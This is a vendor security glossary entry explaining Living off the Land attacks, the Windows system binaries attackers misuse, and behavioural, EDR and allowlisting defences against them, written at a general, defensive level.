LOLBins (Living Off the Land Binaries) are legitimate executables found on a system (like certutil.exe or bitsadmin.exe) that attackers repurpose to download malicious payloads or execute code.

How do you detect LotL attacks?

Since LotL attacks use trusted tools, traditional antivirus often misses them. Detection requires behavioral analysis (UEBA) to identify when a legitimate tool is being used in an unusual way (e.g., PowerShell downloading a file from an unknown IP).

What is Living off the Land? | Alterra Solutions Security Glossary

Q: What is Living off the Land?

Living off the Land (LotL) is a cyberattack technique where intruders use legitimate, pre-installed system tools (like PowerShell, WMI, or Bash) to conduct malicious activities, rather than installing custom malware.

Hiding in Plain Sight

Why bring a custom virus that might get caught by antivirus, when the computer already has tools that can do the same damage? "Living off the Land" is the digital equivalent of a burglar using the homeowner's own ladder to break in.

How It Works

Attackers use what are known as LOLBins (Living Off the Land Binaries). These are binaries supplied by the operating system that are normally used for legitimate purposes but can be abused.

Common LOLBins

PowerShell: Used by admins for automation; used by attackers to download and execute code in memory.
WMI (Windows Management Instrumentation): Used for system management; used by attackers for lateral movement and persistence.
CertUtil: Used to manage certificates; used by attackers to download files from the web.
BitsAdmin: Used for background file transfers; used by attackers to download malware.

Why Traditional Security Fails

Legacy antivirus looks for "bad files." In a LotL attack, there is no bad file. The attacker is running `powershell.exe`, which is a trusted, signed Microsoft binary. To the antivirus, this looks like a system administrator doing their job.

Detection & Mitigation

Since you can't block PowerShell (it would break IT operations), you must monitor how it is used.

Behavioral Analysis (UEBA): Analyzing the command line arguments. Is PowerShell running an encoded string? Is it connecting to a raw IP address?
EDR (Endpoint Detection & Response): Modern EDR agents hook into the OS kernel to see what these tools are actually doing in memory.
Application Whitelisting: Restricting which binaries can execute, though LOLBins often bypass this since they are whitelisted by default.

Alterra's Perspective

We design our defense software assuming LotL attacks will happen. We employ strict constrained language modes for scripting engines and enforce Just-Enough-Administration (JEA) principles to limit what built-in tools can do, even if an attacker gains access to them.